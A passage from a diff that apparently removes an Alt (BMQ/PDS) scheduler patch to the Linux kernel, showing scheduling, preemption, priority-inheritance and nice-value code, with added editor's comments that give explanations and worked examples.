-+			if (!do_raw_spin_trylock(&src_rq->lock))
-+				continue;
-+			spin_acquire(&src_rq->lock.dep_map,
-+				     SINGLE_DEPTH_NESTING, 1, _RET_IP_);
-+
-+			if ((nr_migrated = migrate_pending_tasks(src_rq, rq, cpu))) {
-+				src_rq->nr_running -= nr_migrated;
-+				if (src_rq->nr_running < 2)
-+					cpumask_clear_cpu(i, &sched_rq_pending_mask);
-+
-+				spin_release(&src_rq->lock.dep_map, _RET_IP_);
-+				do_raw_spin_unlock(&src_rq->lock);
-+
-+				rq->nr_running += nr_migrated;
-+				if (rq->nr_running > 1)
-+					cpumask_set_cpu(cpu, &sched_rq_pending_mask);
-+
-+				cpufreq_update_util(rq, 0);
-+
-+				return 1;
-+			}
-+
-+			spin_release(&src_rq->lock.dep_map, _RET_IP_);
-+			do_raw_spin_unlock(&src_rq->lock);
-+		}
-+	} while (++topo_mask < end_mask);
-+
-+	return 0;
-+}
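-+
-+/*
-+ * Editor's note (assumption, not part of the original patch): topo_mask
-+ * appears to walk the per-CPU topology masks from the innermost level
-+ * (e.g. SMT siblings) outward, so pending tasks are pulled from the
-+ * topologically nearest busy runqueue first.
-+ */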
-+#endif
-+
-+/*
-+ * Timeslices below RESCHED_NS are considered as good as expired as there's no
-+ * point rescheduling when there's so little time left.
-+ */
-+static inline void check_curr(struct task_struct *p, struct rq *rq)
-+{
-+	if (unlikely(rq->idle == p))
-+		return;
-+
-+	update_curr(rq, p);
-+
-+	if (p->time_slice < RESCHED_NS)
-+		time_slice_expired(p, rq);
-+}
-+
-+static inline struct task_struct *
-+choose_next_task(struct rq *rq, int cpu)
-+{
-+	struct task_struct *next;
-+
-+	if (unlikely(rq->skip)) {
-+		next = rq_runnable_task(rq);
-+		if (next == rq->idle) {
-+#ifdef	CONFIG_SMP
-+			if (!take_other_rq_tasks(rq, cpu)) {
-+#endif
-+				rq->skip = NULL;
-+				schedstat_inc(rq->sched_goidle);
-+				return next;
-+#ifdef	CONFIG_SMP
-+			}
-+			next = rq_runnable_task(rq);
-+#endif
-+		}
-+		rq->skip = NULL;
-+#ifdef CONFIG_HIGH_RES_TIMERS
-+		hrtick_start(rq, next->time_slice);
-+#endif
-+		return next;
-+	}
-+
-+	next = sched_rq_first_task(rq);
-+	if (next == rq->idle) {
-+#ifdef	CONFIG_SMP
-+		if (!take_other_rq_tasks(rq, cpu)) {
-+#endif
-+			schedstat_inc(rq->sched_goidle);
-+			/*printk(KERN_INFO "sched: choose_next_task(%d) idle %px\n", cpu, next);*/
-+			return next;
-+#ifdef	CONFIG_SMP
-+		}
-+		next = sched_rq_first_task(rq);
-+#endif
-+	}
-+#ifdef CONFIG_HIGH_RES_TIMERS
-+	hrtick_start(rq, next->time_slice);
-+#endif
-+	/*printk(KERN_INFO "sched: choose_next_task(%d) next %px\n", cpu,
-+	 * next);*/
-+	return next;
-+}
-+
-+/*
-+ * Constants for the sched_mode argument of __schedule().
-+ *
-+ * The mode argument allows RT enabled kernels to differentiate a
-+ * preemption from blocking on an 'sleeping' spin/rwlock. Note that
-+ * SM_MASK_PREEMPT for !RT has all bits set, which allows the compiler to
-+ * optimize the AND operation out and just check for zero.
-+ */
-+#define SM_NONE			0x0
-+#define SM_PREEMPT		0x1
-+#define SM_RTLOCK_WAIT		0x2
-+
-+#ifndef CONFIG_PREEMPT_RT
-+# define SM_MASK_PREEMPT	(~0U)
-+#else
-+# define SM_MASK_PREEMPT	SM_PREEMPT
-+#endif
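-+
-+/*
-+ * Editor's note (illustrative, not part of the original patch): with the
-+ * !PREEMPT_RT definition above, SM_MASK_PREEMPT is all-ones, so a test
-+ * like
-+ *
-+ *	if (!(sched_mode & SM_MASK_PREEMPT))
-+ *
-+ * reduces to a plain !sched_mode zero test; only PREEMPT_RT needs the
-+ * mask to tell SM_PREEMPT apart from SM_RTLOCK_WAIT.
-+ */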
-+
-+/*
-+ * schedule() is the main scheduler function.
-+ *
-+ * The main means of driving the scheduler and thus entering this function are:
-+ *
-+ *   1. Explicit blocking: mutex, semaphore, waitqueue, etc.
-+ *
-+ *   2. TIF_NEED_RESCHED flag is checked on interrupt and userspace return
-+ *      paths. For example, see arch/x86/entry_64.S.
-+ *
-+ *      To drive preemption between tasks, the scheduler sets the flag in timer
-+ *      interrupt handler scheduler_tick().
-+ *
-+ *   3. Wakeups don't really cause entry into schedule(). They add a
-+ *      task to the run-queue and that's it.
-+ *
-+ *      Now, if the new task added to the run-queue preempts the current
-+ *      task, then the wakeup sets TIF_NEED_RESCHED and schedule() gets
-+ *      called on the nearest possible occasion:
-+ *
-+ *       - If the kernel is preemptible (CONFIG_PREEMPTION=y):
-+ *
-+ *         - in syscall or exception context, at the next outermost
-+ *           preempt_enable(). (this might be as soon as the wake_up()'s
-+ *           spin_unlock()!)
-+ *
-+ *         - in IRQ context, return from interrupt-handler to
-+ *           preemptible context
-+ *
-+ *       - If the kernel is not preemptible (CONFIG_PREEMPTION is not set)
-+ *         then at the next:
-+ *
-+ *          - cond_resched() call
-+ *          - explicit schedule() call
-+ *          - return from syscall or exception to user-space
-+ *          - return from interrupt-handler to user-space
-+ *
-+ * WARNING: must be called with preemption disabled!
-+ */
-+static void __sched notrace __schedule(unsigned int sched_mode)
-+{
-+	struct task_struct *prev, *next;
-+	unsigned long *switch_count;
-+	unsigned long prev_state;
-+	struct rq *rq;
-+	int cpu;
-+	int deactivated = 0;
-+
-+	cpu = smp_processor_id();
-+	rq = cpu_rq(cpu);
-+	prev = rq->curr;
-+
-+	schedule_debug(prev, !!sched_mode);
-+
-+	/* bypass sched_feat(HRTICK) checking, which Alt schedule FW doesn't support */
-+	hrtick_clear(rq);
-+
-+	local_irq_disable();
-+	rcu_note_context_switch(!!sched_mode);
-+
-+	/*
-+	 * Make sure that signal_pending_state()->signal_pending() below
-+	 * can't be reordered with __set_current_state(TASK_INTERRUPTIBLE)
-+	 * done by the caller to avoid the race with signal_wake_up():
-+	 *
-+	 * __set_current_state(@state)		signal_wake_up()
-+	 * schedule()				  set_tsk_thread_flag(p, TIF_SIGPENDING)
-+	 *					  wake_up_state(p, state)
-+	 *   LOCK rq->lock			    LOCK p->pi_state
-+	 *   smp_mb__after_spinlock()		    smp_mb__after_spinlock()
-+	 *     if (signal_pending_state())	    if (p->state & @state)
-+	 *
-+	 * Also, the membarrier system call requires a full memory barrier
-+	 * after coming from user-space, before storing to rq->curr.
-+	 */
-+	raw_spin_lock(&rq->lock);
-+	smp_mb__after_spinlock();
-+
-+	update_rq_clock(rq);
-+
-+	switch_count = &prev->nivcsw;
-+	/*
-+	 * We must load prev->state once (task_struct::state is volatile), such
-+	 * that we form a control dependency vs deactivate_task() below.
-+	 */
-+	prev_state = READ_ONCE(prev->__state);
-+	if (!(sched_mode & SM_MASK_PREEMPT) && prev_state) {
-+		if (signal_pending_state(prev_state, prev)) {
-+			WRITE_ONCE(prev->__state, TASK_RUNNING);
-+		} else {
-+			prev->sched_contributes_to_load =
-+				(prev_state & TASK_UNINTERRUPTIBLE) &&
-+				!(prev_state & TASK_NOLOAD) &&
-+				!(prev_state & TASK_FROZEN);
-+
-+			if (prev->sched_contributes_to_load)
-+				rq->nr_uninterruptible++;
-+
-+			/*
-+			 * __schedule()			ttwu()
-+			 *   prev_state = prev->state;    if (p->on_rq && ...)
-+			 *   if (prev_state)		    goto out;
-+			 *     p->on_rq = 0;		  smp_acquire__after_ctrl_dep();
-+			 *				  p->state = TASK_WAKING
-+			 *
-+			 * Where __schedule() and ttwu() have matching control dependencies.
-+			 *
-+			 * After this, schedule() must not care about p->state any more.
-+			 */
-+			sched_task_deactivate(prev, rq);
-+			deactivate_task(prev, rq);
-+			deactivated = 1;
-+
-+			if (prev->in_iowait) {
-+				atomic_inc(&rq->nr_iowait);
-+				delayacct_blkio_start();
-+			}
-+		}
-+		switch_count = &prev->nvcsw;
-+	}
-+
-+	check_curr(prev, rq);
-+
-+	next = choose_next_task(rq, cpu);
-+	clear_tsk_need_resched(prev);
-+	clear_preempt_need_resched();
-+#ifdef CONFIG_SCHED_DEBUG
-+	rq->last_seen_need_resched_ns = 0;
-+#endif
-+
-+	if (likely(prev != next)) {
-+		if (deactivated)
-+			update_sched_preempt_mask(rq);
-+		next->last_ran = rq->clock_task;
-+		rq->last_ts_switch = rq->clock;
-+
-+		rq->nr_switches++;
-+		/*
-+		 * RCU users of rcu_dereference(rq->curr) may not see
-+		 * changes to task_struct made by pick_next_task().
-+		 */
-+		RCU_INIT_POINTER(rq->curr, next);
-+		/*
-+		 * The membarrier system call requires each architecture
-+		 * to have a full memory barrier after updating
-+		 * rq->curr, before returning to user-space.
-+		 *
-+		 * Here are the schemes providing that barrier on the
-+		 * various architectures:
-+		 * - mm ? switch_mm() : mmdrop() for x86, s390, sparc, PowerPC.
-+		 *   switch_mm() relies on membarrier_arch_switch_mm() on PowerPC.
-+		 * - finish_lock_switch() for weakly-ordered
-+		 *   architectures where spin_unlock is a full barrier,
-+		 * - switch_to() for arm64 (weakly-ordered, spin_unlock
-+		 *   is a RELEASE barrier),
-+		 */
-+		++*switch_count;
-+
-+		psi_sched_switch(prev, next, !task_on_rq_queued(prev));
-+
-+		trace_sched_switch(sched_mode & SM_MASK_PREEMPT, prev, next, prev_state);
-+
-+		/* Also unlocks the rq: */
-+		rq = context_switch(rq, prev, next);
-+	} else {
-+		__balance_callbacks(rq);
-+		raw_spin_unlock_irq(&rq->lock);
-+	}
-+
-+#ifdef CONFIG_SCHED_SMT
-+	sg_balance(rq);
-+#endif
-+}
-+
-+void __noreturn do_task_dead(void)
-+{
-+	/* Causes final put_task_struct in finish_task_switch(): */
-+	set_special_state(TASK_DEAD);
-+
-+	/* Tell freezer to ignore us: */
-+	current->flags |= PF_NOFREEZE;
-+
-+	__schedule(SM_NONE);
-+	BUG();
-+
-+	/* Avoid "noreturn function does return" - but don't continue if BUG() is a NOP: */
-+	for (;;)
-+		cpu_relax();
-+}
-+
-+static inline void sched_submit_work(struct task_struct *tsk)
-+{
-+	unsigned int task_flags;
-+
-+	if (task_is_running(tsk))
-+		return;
-+
-+	task_flags = tsk->flags;
-+	/*
-+	 * If a worker goes to sleep, notify and ask workqueue whether it
-+	 * wants to wake up a task to maintain concurrency.
-+	 */
-+	if (task_flags & (PF_WQ_WORKER | PF_IO_WORKER)) {
-+		if (task_flags & PF_WQ_WORKER)
-+			wq_worker_sleeping(tsk);
-+		else
-+			io_wq_worker_sleeping(tsk);
-+	}
-+
-+	/*
-+	 * spinlock and rwlock must not flush block requests.  This will
-+	 * deadlock if the callback attempts to acquire a lock which is
-+	 * already acquired.
-+	 */
-+	SCHED_WARN_ON(current->__state & TASK_RTLOCK_WAIT);
-+
-+	/*
-+	 * If we are going to sleep and we have plugged IO queued,
-+	 * make sure to submit it to avoid deadlocks.
-+	 */
-+	blk_flush_plug(tsk->plug, true);
-+}
-+
-+static void sched_update_worker(struct task_struct *tsk)
-+{
-+	if (tsk->flags & (PF_WQ_WORKER | PF_IO_WORKER)) {
-+		if (tsk->flags & PF_WQ_WORKER)
-+			wq_worker_running(tsk);
-+		else
-+			io_wq_worker_running(tsk);
-+	}
-+}
-+
-+asmlinkage __visible void __sched schedule(void)
-+{
-+	struct task_struct *tsk = current;
-+
-+	sched_submit_work(tsk);
-+	do {
-+		preempt_disable();
-+		__schedule(SM_NONE);
-+		sched_preempt_enable_no_resched();
-+	} while (need_resched());
-+	sched_update_worker(tsk);
-+}
-+EXPORT_SYMBOL(schedule);
-+
-+/*
-+ * synchronize_rcu_tasks() makes sure that no task is stuck in preempted
-+ * state (have scheduled out non-voluntarily) by making sure that all
-+ * tasks have either left the run queue or have gone into user space.
-+ * As idle tasks do not do either, they must not ever be preempted
-+ * (schedule out non-voluntarily).
-+ *
-+ * schedule_idle() is similar to schedule_preempt_disabled() except that it
-+ * never enables preemption because it does not call sched_submit_work().
-+ */
-+void __sched schedule_idle(void)
-+{
-+	/*
-+	 * As this skips calling sched_submit_work(), which the idle task does
-+	 * regardless because that function is a nop when the task is in a
-+	 * TASK_RUNNING state, make sure this isn't used someplace that the
-+	 * current task can be in any other state. Note, idle is always in the
-+	 * TASK_RUNNING state.
-+	 */
-+	WARN_ON_ONCE(current->__state);
-+	do {
-+		__schedule(SM_NONE);
-+	} while (need_resched());
-+}
-+
-+#if defined(CONFIG_CONTEXT_TRACKING_USER) && !defined(CONFIG_HAVE_CONTEXT_TRACKING_USER_OFFSTACK)
-+asmlinkage __visible void __sched schedule_user(void)
-+{
-+	/*
-+	 * If we come here after a random call to set_need_resched(),
-+	 * or we have been woken up remotely but the IPI has not yet arrived,
-+	 * we haven't yet exited the RCU idle mode. Do it here manually until
-+	 * we find a better solution.
-+	 *
-+	 * NB: There are buggy callers of this function.  Ideally we
-+	 * should warn if prev_state != CONTEXT_USER, but that will trigger
-+	 * too frequently to make sense yet.
-+	 */
-+	enum ctx_state prev_state = exception_enter();
-+	schedule();
-+	exception_exit(prev_state);
-+}
-+#endif
-+
-+/**
-+ * schedule_preempt_disabled - called with preemption disabled
-+ *
-+ * Returns with preemption disabled. Note: preempt_count must be 1
-+ */
-+void __sched schedule_preempt_disabled(void)
-+{
-+	sched_preempt_enable_no_resched();
-+	schedule();
-+	preempt_disable();
-+}
-+
-+#ifdef CONFIG_PREEMPT_RT
-+void __sched notrace schedule_rtlock(void)
-+{
-+	do {
-+		preempt_disable();
-+		__schedule(SM_RTLOCK_WAIT);
-+		sched_preempt_enable_no_resched();
-+	} while (need_resched());
-+}
-+NOKPROBE_SYMBOL(schedule_rtlock);
-+#endif
-+
-+static void __sched notrace preempt_schedule_common(void)
-+{
-+	do {
-+		/*
-+		 * Because the function tracer can trace preempt_count_sub()
-+		 * and it also uses preempt_enable/disable_notrace(), if
-+		 * NEED_RESCHED is set, the preempt_enable_notrace() called
-+		 * by the function tracer will call this function again and
-+		 * cause infinite recursion.
-+		 *
-+		 * Preemption must be disabled here before the function
-+		 * tracer can trace. Break up preempt_disable() into two
-+		 * calls. One to disable preemption without fear of being
-+		 * traced. The other to still record the preemption latency,
-+		 * which can also be traced by the function tracer.
-+		 */
-+		preempt_disable_notrace();
-+		preempt_latency_start(1);
-+		__schedule(SM_PREEMPT);
-+		preempt_latency_stop(1);
-+		preempt_enable_no_resched_notrace();
-+
-+		/*
-+		 * Check again in case we missed a preemption opportunity
-+		 * between schedule and now.
-+		 */
-+	} while (need_resched());
-+}
-+
-+#ifdef CONFIG_PREEMPTION
-+/*
-+ * This is the entry point to schedule() from in-kernel preemption
-+ * off of preempt_enable.
-+ */
-+asmlinkage __visible void __sched notrace preempt_schedule(void)
-+{
-+	/*
-+	 * If there is a non-zero preempt_count or interrupts are disabled,
-+	 * we do not want to preempt the current task. Just return..
-+	 */
-+	if (likely(!preemptible()))
-+		return;
-+
-+	preempt_schedule_common();
-+}
-+NOKPROBE_SYMBOL(preempt_schedule);
-+EXPORT_SYMBOL(preempt_schedule);
-+
-+#ifdef CONFIG_PREEMPT_DYNAMIC
-+#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
-+#ifndef preempt_schedule_dynamic_enabled
-+#define preempt_schedule_dynamic_enabled	preempt_schedule
-+#define preempt_schedule_dynamic_disabled	NULL
-+#endif
-+DEFINE_STATIC_CALL(preempt_schedule, preempt_schedule_dynamic_enabled);
-+EXPORT_STATIC_CALL_TRAMP(preempt_schedule);
-+#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
-+static DEFINE_STATIC_KEY_TRUE(sk_dynamic_preempt_schedule);
-+void __sched notrace dynamic_preempt_schedule(void)
-+{
-+	if (!static_branch_unlikely(&sk_dynamic_preempt_schedule))
-+		return;
-+	preempt_schedule();
-+}
-+NOKPROBE_SYMBOL(dynamic_preempt_schedule);
-+EXPORT_SYMBOL(dynamic_preempt_schedule);
-+#endif
-+#endif
-+
-+/**
-+ * preempt_schedule_notrace - preempt_schedule called by tracing
-+ *
-+ * The tracing infrastructure uses preempt_enable_notrace to prevent
-+ * recursion and tracing preempt enabling caused by the tracing
-+ * infrastructure itself. But as tracing can happen in areas coming
-+ * from userspace or just about to enter userspace, a preempt enable
-+ * can occur before user_exit() is called. This will cause the scheduler
-+ * to be called when the system is still in usermode.
-+ *
-+ * To prevent this, the preempt_enable_notrace will use this function
-+ * instead of preempt_schedule() to exit user context if needed before
-+ * calling the scheduler.
-+ */
-+asmlinkage __visible void __sched notrace preempt_schedule_notrace(void)
-+{
-+	enum ctx_state prev_ctx;
-+
-+	if (likely(!preemptible()))
-+		return;
-+
-+	do {
-+		/*
-+		 * Because the function tracer can trace preempt_count_sub()
-+		 * and it also uses preempt_enable/disable_notrace(), if
-+		 * NEED_RESCHED is set, the preempt_enable_notrace() called
-+		 * by the function tracer will call this function again and
-+		 * cause infinite recursion.
-+		 *
-+		 * Preemption must be disabled here before the function
-+		 * tracer can trace. Break up preempt_disable() into two
-+		 * calls. One to disable preemption without fear of being
-+		 * traced. The other to still record the preemption latency,
-+		 * which can also be traced by the function tracer.
-+		 */
-+		preempt_disable_notrace();
-+		preempt_latency_start(1);
-+		/*
-+		 * Needs preempt disabled in case user_exit() is traced
-+		 * and the tracer calls preempt_enable_notrace() causing
-+		 * an infinite recursion.
-+		 */
-+		prev_ctx = exception_enter();
-+		__schedule(SM_PREEMPT);
-+		exception_exit(prev_ctx);
-+
-+		preempt_latency_stop(1);
-+		preempt_enable_no_resched_notrace();
-+	} while (need_resched());
-+}
-+EXPORT_SYMBOL_GPL(preempt_schedule_notrace);
-+
-+#ifdef CONFIG_PREEMPT_DYNAMIC
-+#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
-+#ifndef preempt_schedule_notrace_dynamic_enabled
-+#define preempt_schedule_notrace_dynamic_enabled	preempt_schedule_notrace
-+#define preempt_schedule_notrace_dynamic_disabled	NULL
-+#endif
-+DEFINE_STATIC_CALL(preempt_schedule_notrace, preempt_schedule_notrace_dynamic_enabled);
-+EXPORT_STATIC_CALL_TRAMP(preempt_schedule_notrace);
-+#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
-+static DEFINE_STATIC_KEY_TRUE(sk_dynamic_preempt_schedule_notrace);
-+void __sched notrace dynamic_preempt_schedule_notrace(void)
-+{
-+	if (!static_branch_unlikely(&sk_dynamic_preempt_schedule_notrace))
-+		return;
-+	preempt_schedule_notrace();
-+}
-+NOKPROBE_SYMBOL(dynamic_preempt_schedule_notrace);
-+EXPORT_SYMBOL(dynamic_preempt_schedule_notrace);
-+#endif
-+#endif
-+
-+#endif /* CONFIG_PREEMPTION */
-+
-+/*
-+ * This is the entry point to schedule() from kernel preemption
-+ * off of irq context.
-+ * Note that this is called and returns with irqs disabled. This will
-+ * protect us against recursive calling from irq.
-+ */
-+asmlinkage __visible void __sched preempt_schedule_irq(void)
-+{
-+	enum ctx_state prev_state;
-+
-+	/* Catch callers which need to be fixed */
-+	BUG_ON(preempt_count() || !irqs_disabled());
-+
-+	prev_state = exception_enter();
-+
-+	do {
-+		preempt_disable();
-+		local_irq_enable();
-+		__schedule(SM_PREEMPT);
-+		local_irq_disable();
-+		sched_preempt_enable_no_resched();
-+	} while (need_resched());
-+
-+	exception_exit(prev_state);
-+}
-+
-+int default_wake_function(wait_queue_entry_t *curr, unsigned mode, int wake_flags,
-+			  void *key)
-+{
-+	WARN_ON_ONCE(IS_ENABLED(CONFIG_SCHED_DEBUG) && wake_flags & ~WF_SYNC);
-+	return try_to_wake_up(curr->private, mode, wake_flags);
-+}
-+EXPORT_SYMBOL(default_wake_function);
-+
-+static inline void check_task_changed(struct task_struct *p, struct rq *rq)
-+{
-+	int idx;
-+
-+	/* Trigger resched if task sched_prio has been modified. */
-+	if (task_on_rq_queued(p) && (idx = task_sched_prio_idx(p, rq)) != p->sq_idx) {
-+		requeue_task(p, rq, idx);
-+		check_preempt_curr(rq);
-+	}
-+}
-+
-+static void __setscheduler_prio(struct task_struct *p, int prio)
-+{
-+	p->prio = prio;
-+}
-+
-+#ifdef CONFIG_RT_MUTEXES
-+
-+static inline int __rt_effective_prio(struct task_struct *pi_task, int prio)
-+{
-+	if (pi_task)
-+		prio = min(prio, pi_task->prio);
-+
-+	return prio;
-+}
-+
-+static inline int rt_effective_prio(struct task_struct *p, int prio)
-+{
-+	struct task_struct *pi_task = rt_mutex_get_top_task(p);
-+
-+	return __rt_effective_prio(pi_task, prio);
-+}
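-+
-+/*
-+ * Editor's worked example (not part of the original patch): if a nice-0
-+ * normal task (prio 120) holds an rt_mutex that a prio-49 SCHED_FIFO
-+ * waiter blocks on, rt_effective_prio() returns min(120, 49) == 49,
-+ * boosting the lock holder into the RT range until it unlocks.
-+ */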
-+
-+/*
-+ * rt_mutex_setprio - set the current priority of a task
-+ * @p: task to boost
-+ * @pi_task: donor task
-+ *
-+ * This function changes the 'effective' priority of a task. It does
-+ * not touch ->normal_prio like __setscheduler().
-+ *
-+ * Used by the rt_mutex code to implement priority inheritance
-+ * logic. Call site only calls if the priority of the task changed.
-+ */
-+void rt_mutex_setprio(struct task_struct *p, struct task_struct *pi_task)
-+{
-+	int prio;
-+	struct rq *rq;
-+	raw_spinlock_t *lock;
-+
-+	/* XXX used to be waiter->prio, not waiter->task->prio */
-+	prio = __rt_effective_prio(pi_task, p->normal_prio);
-+
-+	/*
-+	 * If nothing changed; bail early.
-+	 */
-+	if (p->pi_top_task == pi_task && prio == p->prio)
-+		return;
-+
-+	rq = __task_access_lock(p, &lock);
-+	update_rq_clock(rq);
-+	/*
-+	 * Set under pi_lock && rq->lock, such that the value can be used under
-+	 * either lock.
-+	 *
-+	 * Note that there are loads of tricky details required to make this
-+	 * pointer cache work right. rt_mutex_slowunlock()+rt_mutex_postunlock()
-+	 * work together to ensure a task is de-boosted (pi_task is set to NULL)
-+	 * before the task is allowed to run again (and can exit). This ensures
-+	 * the pointer points to a blocked task -- which guarantees the task is
-+	 * present.
-+	 */
-+	p->pi_top_task = pi_task;
-+
-+	/*
-+	 * For FIFO/RR we only need to set prio, if that matches we're done.
-+	 */
-+	if (prio == p->prio)
-+		goto out_unlock;
-+
-+	/*
-+	 * Idle task boosting is a no-no in general. There is one
-+	 * exception, when PREEMPT_RT and NOHZ are active:
-+	 *
-+	 * The idle task calls get_next_timer_interrupt() and holds
-+	 * the timer wheel base->lock on the CPU and another CPU wants
-+	 * to access the timer (probably to cancel it). We can safely
-+	 * ignore the boosting request, as the idle CPU runs this code
-+	 * with interrupts disabled and will complete the lock
-+	 * protected section without being interrupted. So there is no
-+	 * real need to boost.
-+	 */
-+	if (unlikely(p == rq->idle)) {
-+		WARN_ON(p != rq->curr);
-+		WARN_ON(p->pi_blocked_on);
-+		goto out_unlock;
-+	}
-+
-+	trace_sched_pi_setprio(p, pi_task);
-+
-+	__setscheduler_prio(p, prio);
-+
-+	check_task_changed(p, rq);
-+out_unlock:
-+	/* Avoid rq from going away on us: */
-+	preempt_disable();
-+
-+	__balance_callbacks(rq);
-+	__task_access_unlock(p, lock);
-+
-+	preempt_enable();
-+}
-+#else
-+static inline int rt_effective_prio(struct task_struct *p, int prio)
-+{
-+	return prio;
-+}
-+#endif
-+
-+void set_user_nice(struct task_struct *p, long nice)
-+{
-+	unsigned long flags;
-+	struct rq *rq;
-+	raw_spinlock_t *lock;
-+
-+	if (task_nice(p) == nice || nice < MIN_NICE || nice > MAX_NICE)
-+		return;
-+	/*
-+	 * We have to be careful, if called from sys_setpriority(),
-+	 * the task might be in the middle of scheduling on another CPU.
-+	 */
-+	raw_spin_lock_irqsave(&p->pi_lock, flags);
-+	rq = __task_access_lock(p, &lock);
-+
-+	p->static_prio = NICE_TO_PRIO(nice);
-+	/*
-+	 * The RT priorities are set via sched_setscheduler(), but we still
-+	 * allow the 'normal' nice value to be set - but as expected
-+	 * it won't have any effect on scheduling until the task goes
-+	 * back to SCHED_NORMAL/SCHED_BATCH:
-+	 */
-+	if (task_has_rt_policy(p))
-+		goto out_unlock;
-+
-+	p->prio = effective_prio(p);
-+
-+	check_task_changed(p, rq);
-+out_unlock:
-+	__task_access_unlock(p, lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+}
-+EXPORT_SYMBOL(set_user_nice);
-+
-+/*
-+ * is_nice_reduction - check if nice value is an actual reduction
-+ *
-+ * Similar to can_nice() but does not perform a capability check.
-+ *
-+ * @p: task
-+ * @nice: nice value
-+ */
-+static bool is_nice_reduction(const struct task_struct *p, const int nice)
-+{
-+	/* Convert nice value [19,-20] to rlimit style value [1,40]: */
-+	int nice_rlim = nice_to_rlimit(nice);
-+
-+	return (nice_rlim <= task_rlimit(p, RLIMIT_NICE));
-+}
-+
-+/*
-+ * can_nice - check if a task can reduce its nice value
-+ * @p: task
-+ * @nice: nice value
-+ */
-+int can_nice(const struct task_struct *p, const int nice)
-+{
-+	return is_nice_reduction(p, nice) || capable(CAP_SYS_NICE);
-+}
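-+
-+/*
-+ * Editor's worked example (not part of the original patch): assuming the
-+ * usual nice_to_rlimit() mapping of 20 - nice, a task with RLIMIT_NICE
-+ * set to 25 may drop its nice value to -5 (20 - (-5) == 25) without
-+ * CAP_SYS_NICE, while nice -6 (26 > 25) requires the capability.
-+ */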
-+
-+#ifdef __ARCH_WANT_SYS_NICE
-+
-+/*
-+ * sys_nice - change the priority of the current process.
-+ * @increment: priority increment
-+ *
-+ * sys_setpriority is a more generic, but much slower function that
-+ * does similar things.
-+ */
-+SYSCALL_DEFINE1(nice, int, increment)
-+{
-+	long nice, retval;
-+
-+	/*
-+	 * Setpriority might change our priority at the same moment.
-+	 * We don't have to worry. Conceptually one call occurs first
-+	 * and we have a single winner.
-+	 */
-+
-+	increment = clamp(increment, -NICE_WIDTH, NICE_WIDTH);
-+	nice = task_nice(current) + increment;
-+
-+	nice = clamp_val(nice, MIN_NICE, MAX_NICE);
-+	if (increment < 0 && !can_nice(current, nice))
-+		return -EPERM;
-+
-+	retval = security_task_setnice(current, nice);
-+	if (retval)
-+		return retval;
-+
-+	set_user_nice(current, nice);
-+	return 0;
-+}
-+
-+#endif
-+
-+/**
-+ * task_prio - return the priority value of a given task.
-+ * @p: the task in question.
-+ *
-+ * Return: The priority value as seen by users in /proc.
-+ *
-+ * sched policy               return value    kernel prio    user prio/nice
-+ *
-+ * (BMQ) normal, batch, idle  [0 ... 53]      [100 ... 139]  0/[-20 ... 19]/[-7 ... 7]
-+ * (PDS) normal, batch, idle  [0 ... 39]      100            0/[-20 ... 19]
-+ * fifo, rr                   [-1 ... -100]   [99 ... 0]     [0 ... 99]
-+ */
-+int task_prio(const struct task_struct *p)
-+{
-+	return (p->prio < MAX_RT_PRIO) ? p->prio - MAX_RT_PRIO :
-+		task_sched_prio_normal(p, task_rq(p));
-+}
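-+
-+/*
-+ * Editor's worked example (assumption, not part of the original patch):
-+ * with the usual MAX_RT_PRIO-1 - rt_priority mapping, a SCHED_FIFO task
-+ * with rt_priority 50 has kernel prio 49, so task_prio() returns
-+ * 49 - MAX_RT_PRIO == -51, inside the [-1 ... -100] range shown above.
-+ */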
-+
-+/**
-+ * idle_cpu - is a given CPU idle currently?
-+ * @cpu: the processor in question.
-+ *
-+ * Return: 1 if the CPU is currently idle. 0 otherwise.
-+ */
-+int idle_cpu(int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+
-+	if (rq->curr != rq->idle)
-+		return 0;
-+
-+	if (rq->nr_running)
-+		return 0;
-+
-+#ifdef CONFIG_SMP
-+	if (rq->ttwu_pending)
-+		return 0;
-+#endif
-+
-+	return 1;
-+}
-+
-+/**
-+ * idle_task - return the idle task for a given CPU.
-+ * @cpu: the processor in question.
-+ *
-+ * Return: The idle task for the cpu @cpu.
-+ */
-+struct task_struct *idle_task(int cpu)
-+{
-+	return cpu_rq(cpu)->idle;
-+}
-+
-+/**
-+ * find_process_by_pid - find a process with a matching PID value.
-+ * @pid: the pid in question.
-+ *
-+ * The task of @pid, if found. %NULL otherwise.
-+ */
-+static inline struct task_struct *find_process_by_pid(pid_t pid)
-+{
-+	return pid ? find_task_by_vpid(pid) : current;
-+}
-+
-+/*
-+ * sched_setparam() passes in -1 for its policy, to let the functions
-+ * it calls know not to change it.
-+ */
-+#define SETPARAM_POLICY -1
-+
-+static void __setscheduler_params(struct task_struct *p,
-+		const struct sched_attr *attr)
-+{
-+	int policy = attr->sched_policy;
-+
-+	if (policy == SETPARAM_POLICY)
-+		policy = p->policy;
-+
-+	p->policy = policy;
-+
-+	/*
-+	 * Allow the normal nice value to be set, but it will not have
-+	 * any effect on scheduling until the task becomes
-+	 * SCHED_NORMAL/SCHED_BATCH.
-+	 */
-+	p->static_prio = NICE_TO_PRIO(attr->sched_nice);
-+
-+	/*
-+	 * __sched_setscheduler() ensures attr->sched_priority == 0 when
-+	 * !rt_policy. Always setting this ensures that things like
-+	 * getparam()/getattr() don't report silly values for !rt tasks.
-+	 */
-+	p->rt_priority = attr->sched_priority;
-+	p->normal_prio = normal_prio(p);
-+}
-+
-+/*
-+ * check the target process has a UID that matches the current process's
-+ */
-+static bool check_same_owner(struct task_struct *p)
-+{
-+	const struct cred *cred = current_cred(), *pcred;
-+	bool match;
-+
-+	rcu_read_lock();
-+	pcred = __task_cred(p);
-+	match = (uid_eq(cred->euid, pcred->euid) ||
-+		 uid_eq(cred->euid, pcred->uid));
-+	rcu_read_unlock();
-+	return match;
-+}
-+
-+/*
-+ * Allow unprivileged RT tasks to decrease priority.
-+ * Only issue a capable test if needed and only once to avoid an audit
-+ * event on permitted non-privileged operations:
-+ */
-+static int user_check_sched_setscheduler(struct task_struct *p,
-+					 const struct sched_attr *attr,
-+					 int policy, int reset_on_fork)
-+{
-+	if (rt_policy(policy)) {
